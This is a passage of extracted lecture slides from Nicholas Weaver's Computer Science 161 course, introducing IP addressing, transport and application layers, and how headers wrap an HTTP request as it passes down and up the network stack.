Options (variable length)

Data (variable length)

Computer Science 161

Nicholas Weaver

89 of 107

Internet Protocol (IP)

  • Internet Protocol (IP): The universal layer-3 protocol that all devices use to transmit data over the Internet
  • IP address: An address that identifies a device on the Internet
    • IPv4 is 32 bits, typically written as 4 decimal octets, e.g. 35.163.72.93
    • IPv6 is 128 bits, typically written as 8 groups of 2 hex bytes: 2607:f140:8801::1:23
      • If digits or groups are missing, fill with 0’s, so 2607:f140:8801:0000:0000:0000:0001:0023
    • Globally unique from any single perspective
      • For now, you can think of them as just being globally unique
    • IP addresses help nodes make decisions on where to forward the packet

89

Computer Science 161

Nicholas Weaver

90 of 107

Reliability

  • Reliability ensures that packets are received correctly or, if random errors occur, not at all
    • This is implemented with a checksum
    • However, there is no cryptographic MAC, so there are no guarantees if an attacker modifies packets
  • IP is unreliable and only provides a best effort delivery service, which means:
    • Packets may be lost (“dropped”)
    • Packets may be corrupted
    • Packets may be delivered out of order
  • It is up to higher level protocols to ensure that the connection is reliable

90

Computer Science 161

Nicholas Weaver

91 of 107

Layer 3: Network Layer

91

A

Router

C

D

E

B

Router

Router

Router

Router

Router

Router

Source: A

Destination: D

“Hello, this is A…”

Layer 3: “How do I get this packet from A to D?”

Next: How do we reliably send any length of data, not just packets?

Computer Science 161

Nicholas Weaver

92 of 107

Layer 4: Transport Layer

  • Provides: Transportation of variable-length data from any point to any other point
    • Relies upon: Sending packets from any device to any other device
    • Builds abstractions that are useful to applications on top of layer 3 packets
  • Useful abstractions
    • Reliability: Transmit data reliably, in order
    • Ports: Provide multiple “addresses” per real IP address
  • Examples
    • TCP: Provides reliability and ports
    • UDP: Provides ports, but no reliability
    • We’ll talk a lot about these protocols soon!

92

Physical

1

Application

7

Link

2

(Inter) Network

3

Transport

4

Computer Science 161

Nicholas Weaver

93 of 107

Layer 4: Transport Layer

93

A

D

I am now sending an arbitrary length message that will probably be broken into several packets…

Unreliable Internet

Layer 4: “How do I transport this arbitrary data over an unreliable medium?”

Computer Science 161

Nicholas Weaver

94 of 107

Layer 7: Application Layer

  • Provides: Applications and services to users!
    • Relies upon: Transportation of variable-length data from any point to any other point
  • Every online application is Layer 7
    • Web browsing
    • Online video games
    • Messaging services
    • Video calls (Zoom)

94

Physical

1

Link

2

(Inter) Network

3

Transport

4

Application

7

Computer Science 161

Nicholas Weaver

95 of 107

Layers of Abstraction and Headers

  • As you move to lower layers, you wrap additional headers around the message
  • As you move to higher layers, you peel off headers around the message
  • When sending a message we go from the highest to the lowest layer
  • When receiving a message we go from the lowest to highest layer

95

Computer Science 161

Nicholas Weaver

96 of 107

Example: HTTP Request

96

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

97 of 107

Example: HTTP Request

97

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

98 of 107

Example: HTTP Request

98

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Final destination

Computer Science 161

Nicholas Weaver

99 of 107

Example: HTTP Request

99

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 20:61:84:3a:a9:52

To: 6d:36:ff:4a:32:92

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Address of next hop

Computer Science 161

Nicholas Weaver

100 of 107

Example: HTTP Request

100

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 20:61:84:3a:a9:52

To: 6d:36:ff:4a:32:92

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Converted into bits and transmitted

Computer Science 161

Nicholas Weaver

101 of 107

Example: HTTP Request

101

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 89:8d:33:25:47:24

To: d5:a9:20:68:e0:80

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Received over the physical medium

Notice: The MAC addresses changed because the recipient is on a different network

Computer Science 161

Nicholas Weaver

102 of 107

Example: HTTP Request

102

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 89:8d:33:25:47:24

To: d5:a9:20:68:e0:80

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

103 of 107

Example: HTTP Request

103

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: 1.2.3.4

To: 5.6.7.8

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

104 of 107

Example: HTTP Request

104

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

From: Port 1234

To: Port 80

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

105 of 107

Example: HTTP Request

105

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

GET / HTTP/1.1

...

Computer Science 161

Nicholas Weaver

106 of 107

Example: HTTP Request

106

HTTP

TCP

IP

Ethernet

Wires

HTTP

TCP

IP

Ethernet

Wires

Relies upon: Transport of data

Provides: Transport of data

Relies upon: Global packet delivery

Provides: Global packet delivery

Relies upon: Local frame delivery

Provides: Local frame delivery

Relies upon: Communication of bits

Provides: Communication of bits

Computer Science 161

Nicholas Weaver

107 of 107

Summary: Intro to Networking

  • Internet: A global network of computers
    • Protocols: Agreed-upon systems of communication
  • OSI model: A layered model of protocols
    • Layer 1: Communication of bits
    • Layer 2: Local frame delivery
      • Ethernet: The most common Layer 2 protocol
      • MAC addresses: 6-byte addressing system used by Ethernet
    • Layer 3: Global packet delivery
      • IP: The universal Layer 3 protocol
      • IP addresses: 4-byte (or 16-byte) addressing system used by IP
    • Layer 4: Transport of data (more on this next time)
    • Layer 7: Applications and services (the web)

107

Application

Transport

(Inter) Network

Link

Physical

1

2

3

4

7

Computer Science 161

Nicholas Weaver